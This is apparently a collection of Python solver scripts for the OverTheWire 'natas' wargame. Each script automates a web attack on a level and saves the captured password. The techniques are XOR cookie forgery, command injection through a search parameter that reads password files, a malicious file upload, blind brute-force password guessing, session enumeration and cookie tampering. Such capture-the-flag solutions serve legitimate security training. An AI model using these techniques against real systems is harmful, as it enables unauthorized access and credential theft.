def main(): b64 = base64.b64encode('%s:%s' % (USER,PASSWORD)) cookie = get_cookie(b64) cookie = base64.b64decode(cookie.replace('%3D','=')) #find key based of xor circular functionality key = shorten_key(xor_encrypt(cookie,DEFAULT_JSON)) print('key found: %s' % key) new_cookie = base64.b64encode(xor_encrypt(MY_JSON, key)) response = requests.get ( URL, headers=dict(Authorization='Basic %s' % b64), cookies=dict(data=new_cookie) ) regex = r"natas12 is (\w+)" matches = re.finditer(regex,response.content,re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print ('password found: %s' % password) print ('adding to credentials....') natas.save_credentials('natas12',password) print ('done')
def main(): b64 = base64.b64encode('%s:%s' % (USER,PASSWORD)) response = requests.get ( URL, headers = { 'Authorization' : 'Basic %s' % b64 }, params = { 'needle' : QUERY } ) regex=r"\/etc\/natas_webpass\/natas11:(\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print ('found password: %s' % password ) print ('adding to credentials....') natas.save_credentials('natas11',password) print ('done')
def main(): b64 = base64.b64encode('%s:%s' % (USER,PASSWORD)) response = requests.post ( '%sindex.php' % URL, headers= { 'Authorization':'Basic %s' % b64, 'Content-Type':'multipart/form-data; boundary=---------------------------208637385607827912102593443' }, data=PAYLOAD ) regex=r"href=\"(\w+\/\w+\.php)\"" matches = re.finditer(regex,response.content,re.MULTILINE) filename = None for match in matches: filename = match.group(1) if filename is None: print('failed to find filename') exit print('%s was uploaded succesfully' % filename) response = requests.get ( '%s%s' % (URL,filename), headers=dict(Authorization='Basic %s' % b64) ) password=response.content.replace('\n','') print('password found: %s' % password) print('adding to credentials....') natas.save_credentials('natas13',password) print('done')
def main(): for i in range(0, 641): if (i % 20 == 0): print('requesting: %d' % i) password = do_request(i) if (password is not None): print('found password at %d: %s' % (i, password)) print('adding to credentials....') natas.save_credentials('natas20', password) print('done') break
def main(): response = requests.get(URL, headers=dict(Authorization=B64)) regex = r"Password: (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) for match in matches: print('found password: %s' % match.group(1)) print('adding to credentials....') natas.save_credentials('natas25', match.group(1)) print('done') break
def main(): usr = '******' password = natas.get_credential(usr) b64 = base64.b64encode('%s:%s' % (usr, password)) response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64}) regex = r"<!--The password for natas2 is (\w*?) -->" matches = re.finditer(regex, response.content, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): found_password = match.group(1) break print('found password: %s' % found_password) print('adding to credentials file....') natas.save_credentials('natas2', found_password) print('done')
def main(): PASS = natas.get_credential(USER) b64 = base64.b64encode('%s:%s' % (USER, PASS)) response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64}) regex = r"natas3:(\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print('found password: %s' % password) print('adding to credentials file....') natas.save_credentials('natas3', password) print('done')
def main(): b64 = base64.b64encode('%s:%s' % (USER, PASSWORD)) fldr = find_folder_name(b64) response = requests.get('%s%susers.txt' % (URL, fldr), headers={'Authorization': 'Basic %s' % b64}) regex = r"^natas4:(\w+?)$" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) print('found password: %s' % password) print('adding to credentials file....') natas.save_credentials('natas4', password) print('done') return None
def main(): b64 = base64.b64encode('%s:%s' % (USER,PASSWORD)) password = '' running = True while (running): found = False for c in string.ascii_letters + string.digits : if (guessed_correct(password + c, b64)): password = password + c found = True print(password) break if (not found): break print('found password: %s' % password) print('adding to credentials....') natas.save_credentials('natas16',password) print('done')
def main(): session = random_string() response = requests.get( URL % session, headers= { 'Authorization':B64, 'User-Agent':USER_AGENT }, cookies=dict(PHPSESSID=session) ) regex = r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})" matches = re.finditer(regex,response.content,re.MULTILINE) for match in matches: print('found password: %s' % match.group(1)) print('adding to credentials....') natas.save_credentials('natas26',match.group(1)) print('done')
def main(): b64 = base64.b64encode('%s:%s' % (USER, PASSWORD)) response = requests.get(URL, headers={ 'Authorization': 'Basic %s' % b64, 'Cookie': 'loggedin=1;' }) regex = r"The password for natas6 is (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): found_password = match.group(1) break print('found password: %s' % found_password) print('adding to credentials file....') natas.save_credentials('natas6', found_password) print('done') print('DEBUG: credentials - %s' % natas.get_credentials())
def main(): b64 = base64.b64encode('%s:%s' % (USER, PASSWORD)) response = requests.post(URL, headers=dict(Authorization='Basic %s' % b64), data={ 'username': '******', 'password': '******' }) regex = r"natas15 is (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print('password found: %s' % password) print('adding to credentials....') natas.save_credentials('natas15', password) print('done')
def main(): b64 = base64.b64encode('%s:%s' % (USER, PASSWORD)) e_secret = get_encoded_secret(b64) secret = decode_secret(e_secret) response = requests.post(URL, headers={'Authorization': 'Basic %s' % b64}, data={ 'secret': secret, 'submit': 'Submit+Query' }) regex = r"The password for natas9 is (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print('found password: %s' % password) print('adding password to credentials....') natas.save_credentials('natas9', password) print('done')
def main(): injection = 'admin\nadmin 1' cookie = requests.post(URL, headers=dict(Authorization=B64), data={ 'name': injection }).cookies['PHPSESSID'] print('cookie: %s' % cookie) response = requests.get(URL, headers=dict(Authorization=B64), cookies=dict(PHPSESSID=cookie)) regex = r"Password: (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) for match in matches: print('found password: %s' % match.group(1)) print('adding to credentials....') natas.save_credentials('natas21', match.group(1)) print('done') break